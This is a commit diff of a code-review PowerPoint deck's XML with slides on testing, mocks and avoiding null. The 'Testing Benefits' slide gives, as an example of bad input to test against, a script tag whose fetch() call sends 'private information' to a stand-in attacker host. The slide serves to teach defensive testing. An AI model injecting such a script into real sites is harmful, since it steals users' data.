<commit_message>
Add more information for Code Review presentation
</commit_message>
<xml_diff>
--- a/code_review.pptx
+++ b/code_review.pptx
@@ -13,11 +13,12 @@
     <p:sldId id="263" r:id="rId7"/>
     <p:sldId id="262" r:id="rId8"/>
     <p:sldId id="264" r:id="rId9"/>
-    <p:sldId id="266" r:id="rId10"/>
-    <p:sldId id="267" r:id="rId11"/>
-    <p:sldId id="268" r:id="rId12"/>
-    <p:sldId id="269" r:id="rId13"/>
-    <p:sldId id="270" r:id="rId14"/>
+    <p:sldId id="271" r:id="rId10"/>
+    <p:sldId id="266" r:id="rId11"/>
+    <p:sldId id="267" r:id="rId12"/>
+    <p:sldId id="268" r:id="rId13"/>
+    <p:sldId id="269" r:id="rId14"/>
+    <p:sldId id="270" r:id="rId15"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -4429,7 +4430,7 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3567023" y="783134"/>
+            <a:off x="3797458" y="783134"/>
             <a:ext cx="5057954" cy="948662"/>
           </a:xfrm>
         </p:spPr>
@@ -4437,9 +4438,10 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Testing Benefits</a:t>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Testing</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4463,178 +4465,69 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="1344057" y="1731796"/>
-            <a:ext cx="9964757" cy="4343070"/>
+            <a:ext cx="9964757" cy="3394407"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Defective code,</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
+              <a:t>1. In general, write Test-driven Development code, because it helps to ensure the SOLID principles.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fool-proofing (no offence), Look there is even a definition in the dictionary!</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" lvl="1" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
+              <a:t>2. Write as many edge-cases as possible.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>www.merriam-webster.com</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/dictionary/foolproof</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Security holes</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Performance</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Legibility</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ensures against bad input</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>- Input that is too long. Does it crash the database?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>- What happens if blank input is sent?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>- What happens if UTF-8 is enabled and we send a weird character?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
-              <a:buChar char="-"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>What happens if the user writes this input into the database:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
+              <a:t>3. Use the </a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
                 <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               </a:rPr>
-              <a:t>&lt;script </a:t>
+              <a:t>@</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
                 <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               </a:rPr>
-              <a:t>crossorigin</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>  fetch("https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>iam.hacker.com</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>", { "info": "all your private information" }); </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>&lt;/script&gt;</a:t>
+              <a:t>ParameterizedTest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> annotation in </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0"/>
+              <a:t>JUnit 5</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, https://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>junit.org</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>/junit5/docs/current/user-guide/#writing-tests-parameterized-tests</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4642,7 +4535,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3688686548"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2694085461"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -4687,7 +4580,7 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3797458" y="783134"/>
+            <a:off x="3567023" y="783134"/>
             <a:ext cx="5057954" cy="948662"/>
           </a:xfrm>
         </p:spPr>
@@ -4695,10 +4588,9 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="ctr"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Mocks</a:t>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Testing Benefits</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4727,7 +4619,7 @@
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -4737,15 +4629,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Mocks can be used to change the </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>behaviour</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> of the codebase</a:t>
+              <a:t>Defective code,</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -4755,7 +4639,25 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Unfortunately, some tests need mocks because they are tied to an external system such as HTTP requests or a database. Using mocks can help bypass the code that uses the external system.</a:t>
+              <a:t>Fool-proofing (no offence), Look there is even a definition in the dictionary!</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" lvl="1" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>https://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>www.merriam-webster.com</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>/dictionary/foolproof</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -4765,7 +4667,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>I am not a proponent of mocks because they can trick you into believing your code works.</a:t>
+              <a:t>Security holes</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -4775,15 +4677,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>In AEM we use Mockito, https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>site.mockito.org</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/</a:t>
+              <a:t>Performance</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -4793,15 +4687,105 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>In JavaScript/TypeScript we use Jest, https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>jestjs.io</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/</a:t>
+              <a:t>Legibility</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ensures against bad input</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>- Input that is too long. Does it crash the database?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>- What happens if blank input is sent?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>- What happens if UTF-8 is enabled and we send a weird character?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buChar char="-"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>What happens if the user writes this input into the database:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>&lt;script </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>crossorigin</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>&gt;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>  fetch("https://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>iam.hacker.com</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>", { "info": "all your private information" }); </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>&lt;/script&gt;</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4809,7 +4793,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2783818960"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3688686548"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -4841,6 +4825,173 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B680625F-1D3E-684E-9A97-99AF2D9D74A3}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3797458" y="783134"/>
+            <a:ext cx="5057954" cy="948662"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Mocks</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B84D27A-B095-AC4F-9924-F39C410D75A4}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1344057" y="1731796"/>
+            <a:ext cx="9964757" cy="4343070"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Mocks can be used to change the </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>behaviour</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> of the codebase</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Unfortunately, some tests need mocks because they are tied to an external system such as HTTP requests or a database. Using mocks can help bypass the code that uses the external system.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>I am not a proponent of mocks because they can trick you into believing your code works.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>In AEM we use Mockito, https://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>site.mockito.org</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>/</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>In JavaScript/TypeScript we use Jest, https://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>jestjs.io</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>/</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2783818960"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABFA6D66-A71E-5840-BBCE-2141326B5BF1}"/>
               </a:ext>
             </a:extLst>
@@ -4948,7 +5099,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -6780,7 +6931,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B680625F-1D3E-684E-9A97-99AF2D9D74A3}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84E40A94-D9F6-2D4F-9038-06DF5570F009}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -6791,106 +6942,135 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="3797458" y="783134"/>
-            <a:ext cx="5057954" cy="948662"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Testing</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B84D27A-B095-AC4F-9924-F39C410D75A4}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1344057" y="1731796"/>
-            <a:ext cx="9964757" cy="3394407"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>1. In general, write Test-driven Development code, because it helps to ensure the SOLID principles.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>2. Write as many edge-cases as possible.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>3. Use the </a:t>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Avoid </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
                 <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               </a:rPr>
-              <a:t>@</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
+              <a:t>null</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>!</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0"/>
+            </a:br>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Unless you are using Java</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{856A38F2-763E-3440-8BEE-33884C645D91}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Just avoid </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
                 <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               </a:rPr>
-              <a:t>ParameterizedTest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> annotation in </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0"/>
-              <a:t>JUnit 5</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>junit.org</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/junit5/docs/current/user-guide/#writing-tests-parameterized-tests</a:t>
+              <a:t>null</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Please avoid </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>null</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Instead, write a nullable-version of the code that responds to the same methods, but returns sensible values, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://en.wikipedia.org/wiki/Null_object_pattern</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>I know, I know. Java programmers love </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>null</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>But still, please avoid </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>null</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> in other programming languages.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6898,7 +7078,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2694085461"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4011055160"/>
       </p:ext>
     </p:extLst>
   </p:cSld>

</xml_diff>